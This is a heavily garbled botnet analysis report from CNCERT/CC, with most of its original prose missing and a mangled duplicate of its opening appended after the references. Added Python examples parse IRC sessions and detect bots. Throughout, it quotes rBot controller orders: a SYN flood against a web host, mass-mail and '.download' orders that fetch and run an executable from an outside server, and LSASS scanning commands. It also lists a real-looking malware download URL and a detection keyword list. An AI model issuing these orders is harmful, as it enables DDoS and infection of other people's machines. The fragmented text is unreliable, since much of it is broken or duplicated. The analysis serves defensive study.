CNCERT/CC
CNCERT/CC CNCERTCC_TR_2005-001 (Draft)
Worm, DDoS, Spam, Phishing, Spyware, Botnet
[1]
Bot
DDoS
DDoS
Bot ("Robot")
Bot
Zombie Zombie Bot Bot
Zombie Bot Bot
Zombie
IRC Bot IRC Bot IRC Bot
Channel
IRC Bot
Bot IRC Bot Bot
Command & Control Server IRC Bot IRC &
C&C Server
BotNet Bot C&C Server
IRC 1
Bot
IRC
1 IRC
IRC
Bot
Bot
IRC
AOL Bot IRC Bot AOL AIM-Canbot
Fizzer AOL Instant Messenger Bot
P2P Bot Bot
phatbot P2P
Bot 90 Unix Bot 1993
Eggdrop Bot Bot IRC
Bot Bot Bot
Bot Bot IRC Bot Bot Bot 036hotmailcom
MSN Bot
1999
11 SubSeven 2.1 IRC
IRC Bot IRC Bot
Bot IRC Bot Bot
Windows Spam DDoS Bot
Bot (Worm) Bot
Bot 2003 Deloader Bot
Bot Bot
Bot
Bot
Trojan Horse Bot
IP Bot
IRC DCC
Bot
Spyware
2
Bot
trojan horse
worm
Spyware
virus
2
1
2001
[16]
Botnet
2004 3 19
Witty Witty 10
110 20 50
2
DDoS DDoS
DDoS
DDoS
DDoS DDoS
3
IP CERT MessageLab [9][10] DDoS
4
5
6
socks
IRC IRC Bot
1 IRC Internet Relay Chat
IRC RFC 1459 IRC Channel
IRC
IRC IRC IRC
irc.263.net IP IP IRC Server
A IP1 B IP2 A B
IRC Server irc.263.net
IRC
IRC TCP 6667 6000 7000
IRC Bot 443 8000 500
IRC
2 IRC Bot
IRC Bot IRC IRC
HIRC mIRC 1 IRC Bot IRC
2 IRC Bot
IRC Bot IRC GT bot
IRC mIRC mIRC
mIRC mIRC GT bot
mIRC
IRC Bot IRC IRC Bot
IRC
1 NICK USER Bot IRC
2 PASS IRC PASS TCP
3 JOIN Channel key key
3) MODE IRC Bot
4) PING PONG IRC IRC
PING PONG PING
IRC IRC Bot
PING/PONG IRC Bot
5) PRIVMSG Channel msg Bot
6) DCC SEND Bot
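The handshake and channel join just listed, as an added example that is not part of the CNCERT/CC report: a small RFC 1459 line parser walked over a constructed bot session. The nick, user name, channel, key and topic text are invented; the numeric 332 reply is how a server hands a joining client the channel topic, which for a bot is its standing order.

```python
"""RFC 1459 framing as a bot uses it: NICK/USER, JOIN with key, 332 topic, PRIVMSG.

Added example; the session is constructed to mirror the sequence in the text."""
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class IrcMessage:
    prefix: Optional[str]                       # "nick!user@host" or a server name
    command: str                                # "JOIN", "PRIVMSG", or a numeric like "332"
    params: List[str] = field(default_factory=list)  # middle params plus the trailing one
    raw: str = ""


def parse_irc_line(line: str) -> IrcMessage:
    """Split one CRLF-terminated line into prefix, command and parameters."""
    raw = line.rstrip("\r\n")
    rest, prefix = raw, None
    if rest.startswith(":"):
        prefix, _, rest = rest[1:].partition(" ")
    # The trailing parameter starts at the first " :" and may itself contain spaces.
    head, sep, trailing = rest.partition(" :")
    parts = head.split()
    if not parts:
        raise ValueError("empty IRC line: %r" % line)
    params = parts[1:] + ([trailing] if sep else [])
    return IrcMessage(prefix, parts[0].upper(), params, raw)


def split_prefix(prefix):
    """'nick!user@host' -> (nick, user, host); a server prefix has no '!'."""
    if prefix is None or "!" not in prefix:
        return (prefix, None, None)
    nick, _, userhost = prefix.partition("!")
    user, _, host = userhost.partition("@")
    return (nick, user, host)


# Constructed session: "->" lines are sent by the bot, "<-" lines come from the server.
SESSION = [
    ("->", "NICK CHN|9148119\r\n"),
    ("->", "USER autdeoxsnv 0 0 :CHN|9148119\r\n"),
    ("<-", ":irc.example.net 001 CHN|9148119 :Welcome\r\n"),
    ("->", "JOIN #xdcc dropit\r\n"),                      # channel key "dropit"
    ("<-", ":irc.example.net 332 CHN|9148119 #xdcc :.advscan asn1smb 100 5 0 -b\r\n"),
    ("<-", ":irc.example.net PING :irc.example.net\r\n"),
    ("->", "PONG :irc.example.net\r\n"),
    ("->", "PRIVMSG #xdcc :[SCAN]: Sequential Port Scan started on 10.0.0.0:445\r\n"),
]


def summarize_session(session):
    """What an analyst wants from the exchange: identity, channel, key, the order
    delivered through the topic (numeric 332) and what the bot reported back."""
    info = {"nick": None, "user": None, "channel": None, "key": None,
            "topic_command": None, "reports": []}
    for direction, line in session:
        msg = parse_irc_line(line)
        if direction == "->" and msg.command == "NICK":
            info["nick"] = msg.params[0]
        elif direction == "->" and msg.command == "USER":
            info["user"] = msg.params[0]
        elif direction == "->" and msg.command == "JOIN":
            info["channel"] = msg.params[0]
            info["key"] = msg.params[1] if len(msg.params) > 1 else None
        elif direction == "<-" and msg.command == "332":
            info["topic_command"] = msg.params[2]       # RPL_TOPIC: <nick> <channel> :<topic>
        elif direction == "->" and msg.command == "PRIVMSG":
            info["reports"].append(msg.params[1])
    return info


if __name__ == "__main__":
    for key, value in summarize_session(SESSION).items():
        print(key, "=", value)
```

The same parser reads a sniffer capture line by line; the 332 reply is the one to watch, because a bot needs no PRIVMSG from the controller to start working once the channel topic carries the order.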
3
(Bot) IRC
P2P
IRC DCC 1987
2004 CNCERTCC
1
DDoS
-> PRIVMSG #rbot :.syn www.xxx.com 80 200 3600\n
rbot syn syn flood 200
www.xxx.com 80 syn 3600 -> bot C&C Server
<-
2
(Phishing)
DNS
host pharming
ISP
redirector
[6]
Phishing
3 (Spam)
Spammer
blacklist
1
-> PRIVMSG #rbot :.mm http://www.recpt.com/fetch.php http://www.mail.net/email.html
mm mass mail http://www.recpt.com/
fetch.php php
http://www.mail.net/email.html
ip spammer
2 socks v4v5 Open Relay
Spammer Open Proxy Open Mail Relay
Open Relay Server Open Mail Relay Spammer
Spammer Proxy Open Relay Proxy
Open Relay Spammer Proxy Open Relay
Spammer
socks v4 SMTP Open Relay
socks v4 Open Relay
IP ISP IP
3
email AgoBot
harvest.emails
4 (Spyware)
Spyware Keylogger
-> PRIVMSG #rBot :.download http://www.elitecoders.net/update.exe c:\rBot.exe 1
http://www.elitecoders.net/update.exe c:\rBot.exe 1
Windows Bot
Bot bot
PING/PONG bot
IRC TCP 6667 CNCERTCC
bot bot
cmd.exe "netstat -an" IP
IP
135 445
fport.exe netstat
11
bot
CD-Key
bot
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 DDoS 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp, syn, ddos, http, download, exe, update, scan, exploit, login,
logon, advscan, lsass, dcom, beagle, dameware
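An added example, not from the report, of the keyword-signature approach just described: each flow's payload is first checked for IRC command verbs at line starts (so the check works on 443 or 8000 as well as 6667), then for the bot vocabulary listed above. The flows are constructed, and the split into strong and weak keywords, plus the threshold, are this example's own choices to keep ordinary chat about "updates" and "logins" from alerting.

```python
"""Signature-style check for IRC bot command traffic.

Added example, not from the report. Two observations drive it: an IRC verb at the
start of a line identifies IRC regardless of TCP port, and bot vocabulary
(advscan, lsass, ddos, ...) rarely appears in human chat. Flows are constructed;
the strong/weak split and the threshold are assumptions."""
import re
from collections import namedtuple

IRC_VERBS = {"JOIN", "PASS", "PRIVMSG", "NICK", "TOPIC", "NOTICE", "USER", "PONG"}
BOT_KEYWORDS = ["udp", "syn", "ddos", "http", "download", "exe", "update", "scan",
                "exploit", "login", "logon", "advscan", "lsass", "dcom", "beagle",
                "dameware"]
# Also common in ordinary chat: only count them when several appear together.
WEAK_KEYWORDS = {"http", "exe", "update", "login", "download", "scan"}

IRC_LINE = re.compile(r"^(?::\S+ )?([A-Z]+|\d{3})\b")   # optional prefix, then the verb
WORD = re.compile(r"[a-z0-9]+")                           # splits "http.update", ".advscan"

Flow = namedtuple("Flow", "src dst dport payload")
Alert = namedtuple("Alert", "src dst dport verbs keywords score")


def irc_verbs(payload):
    """IRC verbs found at line starts; an empty set means 'not IRC'."""
    verbs = set()
    for line in payload.split("\r\n"):
        m = IRC_LINE.match(line)
        if m and m.group(1) in IRC_VERBS:
            verbs.add(m.group(1))
    return verbs


def bot_keywords(payload):
    words = set(WORD.findall(payload.lower()))
    return [k for k in BOT_KEYWORDS if k in words]


def inspect_flow(flow, min_weak_hits=3):
    """Alert on an IRC-framed payload carrying a strong keyword, or several weak ones."""
    verbs = irc_verbs(flow.payload)
    if not verbs:
        return None                     # HTTP, SMB, ... are not this rule's business
    hits = bot_keywords(flow.payload)
    strong = [k for k in hits if k not in WEAK_KEYWORDS]
    weak = [k for k in hits if k in WEAK_KEYWORDS]
    if not strong and len(weak) < min_weak_hits:
        return None
    return Alert(flow.src, flow.dst, flow.dport, sorted(verbs), hits,
                 2 * len(strong) + len(weak))


# Constructed sample flows: a bot on 6667, a controller TOPIC on a non-standard port,
# a human chatting on 6667, and plain HTTP that happens to fetch an .exe.
FLOWS = [
    Flow("10.0.0.1", "203.151.217.85", 6667,
         "JOIN #xdcc dropit\r\nPRIVMSG #xdcc :.advscan lsass 200 5 0 -r -s\r\n"),
    Flow("10.0.0.2", "198.51.100.7", 8000,
         ":op!u@h TOPIC #x :.http.update http://server/rBot.exe c:\\rBot.exe 1\r\n"),
    Flow("10.0.0.3", "198.51.100.9", 6667,
         "PRIVMSG #chat :i will update the login page later\r\n"),
    Flow("10.0.0.4", "198.51.100.10", 80,
         "GET /update.exe HTTP/1.0\r\nHost: www.example.com\r\n"),
]


def scan_flows(flows):
    return [a for a in (inspect_flow(f) for f in flows) if a]


if __name__ == "__main__":
    for alert in scan_flows(FLOWS):
        print(alert)
```

The second flow alerts only because three weak words appear together; the human chat with two of them does not. A keyword rule like this still needs the IRC framing check in front of it, otherwise every HTTP download of an .exe trips it.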
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot PING/PONG
DDoSVax [5] Bot
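The three DDoSVax heuristics, implemented as an added example over a constructed connection log (the report gives no code or thresholds; the join window, minimum duration and message-rate limit here are assumptions to be tuned per site). A client that shows two of the three traits is called a bot.

```python
"""Behavioural IRC-bot heuristics: fast joining, long-standing, not talkative.

Added example with a constructed per-client event log, as an IRC server or a
network sensor could reconstruct it; thresholds are illustrative assumptions."""
from collections import defaultdict

# (seconds, client, event, channel). Bots 10.0.0.1-3 join #xdcc within four seconds
# and stay about three hours answering only PINGs; 10.0.0.9 is a human who chats and leaves.
LOG = [
    (0,    "10.0.0.9", "JOIN",    "#chat"),
    (5,    "10.0.0.9", "PRIVMSG", "#chat"),
    (60,   "10.0.0.9", "PRIVMSG", "#chat"),
    (100,  "10.0.0.1", "JOIN",    "#xdcc"),
    (102,  "10.0.0.2", "JOIN",    "#xdcc"),
    (104,  "10.0.0.3", "JOIN",    "#xdcc"),
    (120,  "10.0.0.9", "PRIVMSG", "#chat"),
    (600,  "10.0.0.9", "QUIT",    None),
    (5000, "10.0.0.1", "PRIVMSG", "#xdcc"),      # one scan report in three hours
]
LOG += [(100 + 180 * k, ip, "PONG", None)
        for k in range(1, 60) for ip in ("10.0.0.1", "10.0.0.2", "10.0.0.3")]


def analyze(log, join_window=10, join_burst=3, long_seconds=3600, max_msgs_per_hour=1.0):
    """Per-client flags; two of the three traits mark the client as a bot."""
    first, last, msgs = {}, {}, defaultdict(int)
    joins = defaultdict(list)                      # channel -> [(t, client)]
    for t, client, event, channel in sorted(log, key=lambda e: e[0]):
        first.setdefault(client, t)
        last[client] = t
        if event == "JOIN":
            joins[channel].append((t, client))
        elif event in ("PRIVMSG", "NOTICE"):
            msgs[client] += 1
    # Fast joining: join_burst or more joins to one channel inside join_window seconds.
    fast = set()
    for entries in joins.values():
        entries.sort()
        for i, (t0, _) in enumerate(entries):
            burst = [c for t, c in entries[i:] if t - t0 <= join_window]
            if len(burst) >= join_burst:
                fast.update(burst)
    result = {}
    for client in first:
        duration = max(last[client] - first[client], 1)          # seconds on the server
        rate = msgs[client] / (duration / 3600.0)                # chat messages per hour
        flags = {"fast_join": client in fast,
                 "long_standing": duration >= long_seconds,
                 "not_talkative": rate < max_msgs_per_hour}
        flags["is_bot"] = sum(flags.values()) >= 2
        result[client] = flags
    return result


if __name__ == "__main__":
    for client, flags in sorted(analyze(LOG).items()):
        print(client, flags)
```

PING/PONG traffic is deliberately not counted as talking: it is what keeps an idle bot's connection alive, so it is the signature of the second and third traits rather than evidence against them.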
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server "TOPIC #rBot :.advscan lsass 200 5 0 -r -s"
a)
-> TOPIC #rBot :.advscan lsass 200 5 0 -r -s\n
b)
-> TOPIC #rBot :.advscan lsass 200 5 0 -r -s\n
c) Botnet bot
<- :ControllerNICK!ControllerUSER@socks(HOST or IP) TOPIC #rBot :.advscan lsass 200 5 0 -r -s\r\n
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1, Serv2, ..., ServN
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1) advscan lsass 200 5 0 -r -s
LSASS 200 5 -r = random
-s = silent
2) http.update http://server/rBot.exe c:\rBot.exe 1
server rBot.exe c:\ 1
CNCERTCC TOPIC Bot
TOPIC "JOIN #newchannel"
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
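An IDS-side view of the TOPIC mechanism described above, as an added example that is not the report's code: TOPIC changes are attributed to the setter's nick!user@host, 332 replies are kept but carry no setter (the server sends them), and the command verb is classified so that a JOIN order, which moves the bots to another channel, stands out from scan and DDoS orders. All lines, hosts and channels are constructed.

```python
"""Track channel TOPIC changes and attribute bot orders to the controller host.

Added example, not the report's code. Only the command verbs the report
mentions are classified; everything else is reported as "other"."""
import re
from collections import defaultdict

TOPIC_LINE = re.compile(
    r"^:(?P<prefix>\S+) (?P<cmd>TOPIC|332) (?P<args>[^:]*?) ?:(?P<topic>.*)$")

COMMAND_CLASS = {"advscan": "scan", "syn": "ddos", "udp": "ddos",
                 "http.update": "update", "download": "update", "join": "migrate"}


def classify(topic):
    """('scan', 'advscan') for '.advscan lsass ...'; ('migrate', 'join') for 'JOIN #new'."""
    words = topic.strip().split()
    verb = words[0].lstrip(".").lower() if words else ""
    return COMMAND_CLASS.get(verb, "other"), verb


def track_topics(lines):
    events = []
    controllers = defaultdict(lambda: {"channels": set(), "commands": []})
    for line in lines:
        m = TOPIC_LINE.match(line.rstrip("\r\n"))
        if not m:
            continue                             # PRIVMSG, PING, ... are not topic changes
        prefix, cmd, args, topic = m.group("prefix", "cmd", "args", "topic")
        cls, verb = classify(topic)
        if cmd == "TOPIC":                       # :setter TOPIC #chan :order
            channel, setter = args.split()[0], prefix
            host = prefix.partition("@")[2] or prefix    # a server-set topic has no '@'
        else:                                    # :server 332 nick #chan :order
            channel, setter, host = args.split()[1], None, None
        events.append({"channel": channel, "setter": setter, "class": cls, "topic": topic})
        if host:
            controllers[host]["channels"].add(channel)
            controllers[host]["commands"].append(verb)
    return events, dict(controllers)


# Constructed lines: one controller host using two nicks across two channels,
# a bot's progress report (ignored), and a 332 reply seen by a joining bot.
LINES = [
    ":ctl!op@10.10.10.10 TOPIC #rBot :.advscan lsass 200 5 0 -r -s\r\n",
    ":CHN|9148119!autdeoxsnv@10.0.0.1 PRIVMSG #rBot :[SCAN]: started\r\n",
    ":ctl!op@10.10.10.10 TOPIC #rBot :JOIN #newchannel\r\n",
    ":ctl2!op@10.10.10.10 TOPIC #newchannel :.syn www.xxx.com 80 200 3600\r\n",
    ":irc.example.net 332 CHN|9148119 #xdcc :.advscan asn1smb 100 5 0 -b\r\n",
]

if __name__ == "__main__":
    events, controllers = track_topics(LINES)
    for event in events:
        print(event)
    print(controllers)
```

Keying the controller table on the host rather than the nick is what survives a nick change between channels; the host (or the socks proxy in front of it) is what an investigator can actually follow.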
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v0.65
1
-> PRIVMSG #rbot :.login password -s\n
IP
2 bot
<- :ControllerNICK!ControllerUSER@host PRIVMSG #rbot :.login password -s\r\n
1 2
IP Bot
host
IP
<- :ControllerNICK!ControllerUSER@10.10.10.10 PRIVMSG #rbot :.login password -s\r\n
10.10.10.10 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-> PRIVMSG #rbot :password accepted\n
bot
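The rBot login sequence described above, re-implemented as an added example (not rBot's own code). The order of checks follows the text: the sender's host is matched against a host mask first, then the password, and "-s" suppresses the "password accepted" reply. The host masks, password and nicks are invented.

```python
"""rBot-style controller login check (added example, not rBot's code).

Check order as the text describes it: host mask first, then password;
'-s' makes the bot accept silently. Masks, password and nicks are invented."""
from fnmatch import fnmatchcase

CONFIG = {
    "channel": "#rbot",
    "password": "password",
    "host_masks": ["*.example.net", "*.example.com", "10.10.10.*"],   # assumed masks
}


def handle_line(line, config, authed):
    """Feed one raw line the bot received. Adds an accepted controller's
    nick!user@host to `authed` and returns the bot's reply, or None."""
    raw = line.rstrip("\r\n")
    if not raw.startswith(":"):
        return None
    prefix, _, rest = raw[1:].partition(" ")
    cmd, _, rest = rest.partition(" ")
    target, _, text = rest.partition(" :")
    if cmd != "PRIVMSG" or target != config["channel"] or not text.startswith(".login"):
        return None
    host = prefix.partition("@")[2]
    args = text.split()[1:]
    silent = "-s" in args
    supplied = next((a for a in args if not a.startswith("-")), None)
    if not any(fnmatchcase(host, mask) for mask in config["host_masks"]):
        return None             # host mask fails first; the password is never compared
    if supplied != config["password"]:
        return None
    authed.add(prefix)
    return None if silent else "PRIVMSG %s :password accepted" % config["channel"]


def run(lines, config):
    """Replay a batch of lines; returns (accepted controllers, replies actually sent)."""
    authed, replies = set(), []
    for line in lines:
        reply = handle_line(line, config, authed)
        if reply:
            replies.append(reply)
    return authed, replies


# Constructed traffic: a normal login, a silent login, a login matching the IP mask,
# a wrong host and a wrong password. Only the first produces anything on the wire.
LINES = [
    ":ctl!op@host1.example.net PRIVMSG #rbot :.login password\r\n",
    ":ctl!op@host1.example.net PRIVMSG #rbot :.login password -s\r\n",
    ":c2!op@10.10.10.10 PRIVMSG #rbot :.login password -s\r\n",
    ":evil!x@203.0.113.5 PRIVMSG #rbot :.login password\r\n",
    ":ctl!op@host2.example.com PRIVMSG #rbot :.login wrong\r\n",
]

if __name__ == "__main__":
    print(run(LINES, CONFIG))
```

With "-s" nothing visible leaves the bot, so a network sensor sees only a single inbound PRIVMSG ".login" from a host it has not seen before; that line, not a reply, is the artefact to alert on.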
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Gnutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
http://goa-irc.co.uk/wosten/rbot.exe 2005 7 9 9 rbot.exe
IP 10001
sniffer
cmd.exe
c:\>netstat -an
TCP    0.0.0.0:135       0.0.0.0:0              LISTENING
TCP    0.0.0.0:445       0.0.0.0:0              LISTENING
TCP    10.0.0.1:1150     203.151.217.85:6667    ESTABLISHED
TCP    10.0.0.1:1616     202.108.32.137:445     FIN_WAIT_1
TCP    10.0.0.1:1631     202.108.32.147:445     FIN_WAIT_1
TCP    10.0.0.1:1714     202.108.32.190:445     FIN_WAIT_1
TCP    10.0.0.1:1727     202.108.32.165:445     FIN_WAIT_1
TCP    10.0.0.1:2253     202.108.34.211:445     TIME_WAIT
TCP    10.0.0.1:2904     202.108.37.91:445      TIME_WAIT
TCP    10.0.0.1:3476     202.108.39.151:445     TIME_WAIT
TCP    10.0.0.1:3478     202.108.39.153:445     TIME_WAIT
TCP    10.0.0.1:3480     202.108.39.155:445     TIME_WAIT
TCP    10.0.0.1:3486     202.108.39.151:445     TIME_WAIT
TCP    10.0.0.1:3487     202.108.39.153:445     TIME_WAIT
TCP    10.0.0.1:3488     202.108.39.155:445     TIME_WAIT
TCP    10.0.0.1:3673     202.108.40.82:445      TIME_WAIT
TCP    10.0.0.1:3674     202.108.40.82:445      TIME_WAIT
TCP    10.0.0.1:4953     202.108.45.20:445      TIME_WAIT
TCP    10.0.0.1:4955     202.108.45.20:445      TIME_WAIT
TCP    10.0.0.1:4959     202.108.45.23:445      TIME_WAIT
TCP    10.0.0.1:4961     202.108.45.23:445      TIME_WAIT
UDP    0.0.0.0:69        *:*                    UDP 69
UDP    0.0.0.0:445       *:*
UDP    10.0.0.1:137      *:*
UDP    10.0.0.1:138      *:*
fport.exe
C:\>fport | find "1150"    (1150 6667)
1048 wininit -> 1150 TCP C:\WINNT\system32\wininit.exe
C:\>fport | find "69"
1048 wininit -> 69 UDP C:\WINNT\system32\wininit.exe
6667 69 wininit.exe rBot
wininit.exe Sysinternals FileMon
bot Sysinternals Autoruns
rBot
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"Microsoft Update 32" = wininit.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\"Microsoft Update 32" = wininit.exe
Wininit 445 6667
IP
203.151.217.85:6667
TCP
Wininit IRC
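The netstat/fport triage walked through above, automated as an added example that is not part of the report. Both outputs are constructed to match the sample (bot at 10.0.0.1, C&C on 203.151.217.85:6667, fan-out to port 445, wininit.exe owning the ports); the IRC port range and the fan-out threshold are this example's own assumptions.

```python
"""Triage of 'netstat -an' and 'fport' output for the infection pattern in the text.

Added example, not part of the report. Both outputs are constructed to match
the sample; the IRC port range and the fan-out threshold are assumptions."""
import re

NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    10.0.0.1:1150          203.151.217.85:6667    ESTABLISHED
  TCP    10.0.0.1:1616          202.108.32.137:445     FIN_WAIT_1
  TCP    10.0.0.1:1631          202.108.32.147:445     FIN_WAIT_1
  TCP    10.0.0.1:1714          202.108.32.190:445     FIN_WAIT_1
  TCP    10.0.0.1:2253          202.108.34.211:445     TIME_WAIT
  TCP    10.0.0.1:2904          202.108.37.91:445      TIME_WAIT
  TCP    10.0.0.1:3476          202.108.39.151:445     TIME_WAIT
  TCP    10.0.0.1:3673          202.108.40.82:445      TIME_WAIT
  TCP    10.0.0.1:4953          202.108.45.20:445      TIME_WAIT
  UDP    0.0.0.0:69             *:*
  UDP    0.0.0.0:445            *:*
  UDP    10.0.0.1:137           *:*
"""

FPORT = """\
Pid   Process            Port  Proto Path
1048  wininit        ->  1150  TCP   C:\\WINNT\\system32\\wininit.exe
1048  wininit        ->  69    UDP   C:\\WINNT\\system32\\wininit.exe
4     System         ->  445   TCP
"""

NS_LINE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)(?:\s+(\S+))?\s*$")
FP_LINE = re.compile(r"^\s*(\d+)\s+(\S+)\s+->\s+(\d+)\s+(TCP|UDP)\s*(.*)$")
IRC_PORTS = set(range(6000, 7001))      # 6667 and the surrounding range the text cites


def split_hostport(s):
    host, _, port = s.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def parse_netstat(text):
    conns = []
    for line in text.splitlines():
        m = NS_LINE.match(line)
        if m:
            proto, local, foreign, state = m.groups()
            _, lport = split_hostport(local)
            fhost, fport = split_hostport(foreign)
            conns.append({"proto": proto, "lport": lport, "fhost": fhost,
                          "fport": fport, "state": state or "LISTENING"})
    return conns


def parse_fport(text):
    """(proto, port) -> (pid, process, path)"""
    owners = {}
    for line in text.splitlines():
        m = FP_LINE.match(line)
        if m:
            pid, name, port, proto, path = m.groups()
            owners[(proto, int(port))] = (int(pid), name, path.strip())
    return owners


def triage(netstat_text, fport_text, scan_threshold=5):
    """Findings as (kind, detail, port, owner) tuples, in the order the text checks them."""
    conns, owners = parse_netstat(netstat_text), parse_fport(fport_text)
    findings = []
    for c in conns:
        if c["proto"] == "TCP" and c["state"] == "ESTABLISHED" and c["fport"] in IRC_PORTS:
            findings.append(("irc_c2", c["fhost"], c["fport"], owners.get(("TCP", c["lport"]))))
        if c["proto"] == "UDP" and c["lport"] == 69:    # tftp listener on a workstation
            findings.append(("tftp_listener", c["fhost"], 69, owners.get(("UDP", 69))))
    # Many half-closed connections to port 445 on distinct hosts: the bot is scanning.
    targets = {c["fhost"] for c in conns
               if c["proto"] == "TCP" and c["fport"] == 445 and c["state"] != "ESTABLISHED"}
    if len(targets) >= scan_threshold:
        findings.append(("smb_scan_fanout", len(targets), 445, None))
    return findings


if __name__ == "__main__":
    for finding in triage(NETSTAT, FPORT):
        print(finding)
```

Each finding carries the owning process from fport, so the first thing the output tells you is that one unexpected binary holds both the IRC connection and the tftp listener, which is exactly the pairing the report observed.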
-> NICK CHN|9148119\r\nUSER autdeoxsnv 0 0 :CHN|9148119\r\n
-> JOIN #xdcc dropit\r\n (#xdcc dropit)
<- :CHN|9148119!autdeoxsnv@10.0.0.1 332 CHN|9148119 #xdcc :.advscan asn1smb 100 5 0 -b (advscan asn1smb)
-> PRIVMSG #xdcc :[SCAN]: Sequential Port Scan Started On 10.0.0.0:445 within a delay of 5 seconds for 0 min using 100 threads\r\n
CNCERTCC 2005
[1] 2005.4
[2] Paul F. Roberts, "Malicious Bots Hide Using Rootkit Code", eWeek, May 17, 2005. http://www.eweek.com/article2/0,1759,1816972,00.asp
[3] The Honeynet Project, "Know Your Enemy: Tracking Botnets".
[4] Felix C. Freiling, Thorsten Holz and Georg Wicherski, "Botnet Tracking: Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks". http://www.honeynet.org/papers/individual/
[5] Jonas Bolliger and Thomas Kaufmann, "Detecting Bots in Internet Relay Chat Systems". www.tik.ee.ethz.ch/~ddosvax/ (SA-2004-29, task.pdf)
[6] The Honeynet Project, "Know Your Enemy: Phishing". http://www.honeynet.org, 16 May 2005.
[7] Helen J. Wang, Chuanxiong Guo, Daniel R. Simon and Alf Zugenmaier, "Shield: First-Line Worm Defense", Microsoft Research, ACM SIGCOMM 2004.
[8] http://www.mwcollect.org
[9] http://www.cert.org
[10] http://www.messagelabs.co.uk
[11] Joe Stewart, "Emerging Threats: From Discovery to Protection". www.sdissa.org/downloads/emergingthreats-public.pdf
[12] http://www.ciphertrust.com/resources/statistics/zombie.php
[13] LURHQ Threat Intelligence Group, "Phatbot Trojan Analysis". http://www.lurhq.com/phatbot.html
[14] LURHQ Threat Intelligence Group, "Sinit P2P Trojan Analysis". http://www.lurhq.com/sinit.html
[15] http://www.symantec.com/press/index_2004.html
[16] Tom Vogt, "Simulating and optimising worm propagation algorithms". www.securityfocus.com/guest/24046, 2003.9
Zombie Zombie Bot Bot
Zombie Bot Bot
Zombie
IRC Bot IRC Bot IRC Bot
Channel
IRC Bot
Bot IRC Bot Bot
CommandampControl Server IRC Bot IRC amp
CampC S
BotNet Bot CampC S
IRC 1
Bot
IRC
1 IRC
IRC
Bot
Bot
IRC
AOL Bot IRC Bot AOL AIM-Canbot
Fizzer AOL Instant Messager Bot
P2P Bot Bot
phatbot P2P
Bot 90 Unix Bot 1993
Eggdrop Bot Bot IRC
Bot Bot Bot
Bot Bot IRC Bot Bot Bot 036hotmailcom
MSN Bot
1999
11 SubSeven 21 IRC
IRC Bot IRC Bot
Bot IRC Bot Bot
Windows Spam DDos Bot
Bot (Worm) Bot
Bot 2003 Deloader Bot
Bot Bot
Bot
Bot
Trojan Horse Bot
IP Bot
IRC DCC
Bot
Spyware
2
Bot
trojan horse
worm
Spyware
virus
2
1
2001
[16]
Botnet
2004 3 19
Witty Witty 10
110 20 50
2
DDoS DDoS
DDoS
DDoS
DDoS DDoS
3
IP CERT MessageLab [9][10] DDoS
4
5
6
socks
IRC IRC Bot
1 IRC Internet Relay Chat
IRC RFC1459 IRC Channel
IRC
IRC IRC IRC
irc263net IP IP IRC Server
A IP1 B IP2 A B
IRC Server irc263net
IRC
IRC TCP 6667 6000 7000
IRC Bot 443 8000 500
IRC
2 IRC Bot
IRC Bot IRC IRC
HIRC mIRC 1 IRC Bot IRC
2 IRC Bot
IRC Bot IRC GT bot
IRC mIRC mIRC
mIRC mIRC GT bot
mIRC
IRC Bot IRC IRC Bot
IRC
1 NICK USER Bot IRC
2 PASS IRC PASS TCP
3 JOIN Channel key key
3) MODE IRC Bot
4) PING PONG IRC IRC
PING PONG PING
IRC IRC Bot
PINGPONG IRC Bot
5) PRIVMSG Channel msg Bot
6) DCC SEND Bot
3
(Bot) IRC
P2P
IRC DCC 1987
2004 CNCERTCC
1
DDos
-gtPRIVMSG rbot syn wwwxxxcom
80 200 3600n
rbot syn syn flood 200
wwwxxxcom 80 syn 3600 -gt bot CampC S
lt-
2
(Phishing)
DNS
host pharming
ISP
redirector
[6]
Phi s h i ng
3 (Spam)
Spammer
blacklist
1
-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml
